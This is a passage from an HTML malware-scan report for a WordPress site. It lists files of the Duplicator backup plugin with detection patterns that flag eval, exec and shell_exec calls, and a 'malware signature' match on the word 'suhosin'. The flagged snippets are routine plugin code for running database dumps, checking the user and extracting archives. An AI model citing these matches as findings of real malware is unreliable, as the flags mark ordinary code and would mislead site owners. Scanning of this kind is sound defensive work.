#007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">,&nbsp;(bool)(</span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #DD0000">'whirlpool'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">hash_algos</span><span style="color: #007700">())));&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$hash&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">;&nbsp;switch&nbsp;(</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #0000BB">CRYPT_BASE_WHIRL</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$func&nbsp;=&nbsp;function&nbsp;($_action,&nbsp;&amp;$self,&nbsp;$_text)&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;};'</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$func</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CR...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_174").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/installer/dup-installer/classes/config/class.constants.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_175" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_175").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/classes/utilities/class.u.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_176" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'whoami'</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_geteuid'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_ssdir</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$old_root_perm&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DupLiteSnapLibIOU</span><span style="color: #007700">::</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWindows</span><span style="color: #007700">()&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">strtoupper</span><span style="color: #007700">(</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">PHP_OS</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">))&nbsp;===&nbsp;</span><span style="color: #DD0000">'WIN'</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerUnscramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerScramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_DIE&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'die'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_THROW&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'throw'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_RETURN&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'return'</span><span style="color: #007700">;&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">hasCapability</span><span style="color: #007700">(</span><span style="color: #0000BB">$permis</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 416</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_176").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/classes/utilities/class.u.zip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_177" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$errorMessage&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_U</span><span style="color: #007700">::</span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;extracting&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">):&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$stderr</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #0000BB">$errorMessage</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$zipArchive&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">ZipArchive</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">open</span><span style="color: #007700">(</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;opening&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;when&nbsp;extracting.&nbsp;Error&nbsp;code:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$retVal</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">extractTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$destinationDirectory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$relativeFilesToExtract</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_177").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/classes/package/class.pack.database.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_178" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #DD0000">'Warning:&nbsp;Using&nbsp;a&nbsp;password&nbsp;on&nbsp;the&nbsp;command&nbsp;line&nbsp;interface&nbsp;can&nbsp;be&nbsp;insecure.'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #DD0000">"Ran&nbsp;from&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$exePath</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$tblCreateCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$tables</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$tblFilterCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$tblAllCount&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"FILTERED:&nbsp;[</span><span style="color: #007700">{</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">FilterTables</span><span style="color: #007700">}</span><span style="color: #DD0000">]"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"RESPONSE:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$output</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DUP_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">Info</span><span style="color: #007700">(</span><span style="color: #DD0000">"TABLES:&nbsp;total:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblAllCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;filtered:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblFilterCount</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;|&nbsp;create:</span><span style="color: #007700">{</span><span style="color: #0000BB">$tblCreateCount</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$sql_footer&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"\n\n/*&nbsp;Du...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_178").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/duplicator/classes/class.db.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_179" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$out</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$rc</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$rc&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">getTableCollationList</span><span style="color: #007700">(</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">)&nbsp;{&nbsp;global&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;try&nbsp;{&nbsp;</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">get_results</span><span style="color: #007700">(</span><span style="color: #DD0000">"SHOW&nbsp;TABLE&nbsp;STATUS&nbsp;FROM&nbsp;`</span><span style="color: #007700">{</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">dbname</span><span style="color: #007700">}</span><span style="color: #DD0000">`"</span><span style="color: #007700">);&nbsp;foreach(</span><span style="color: #0000BB">$query&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$key&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$excludeTables</span><span style="color: #007700">))&nbsp;{&nbsp;if&nbsp;(!&nbsp;empty(</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$collations</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$row</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">Collation</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_unique</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">SORT_STRING</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$collations&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_values</span><span style="color: #007700">(</span><span style="color: #0000BB">$collations</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">ret</span><span style="color: #007700">...</span>
</span>
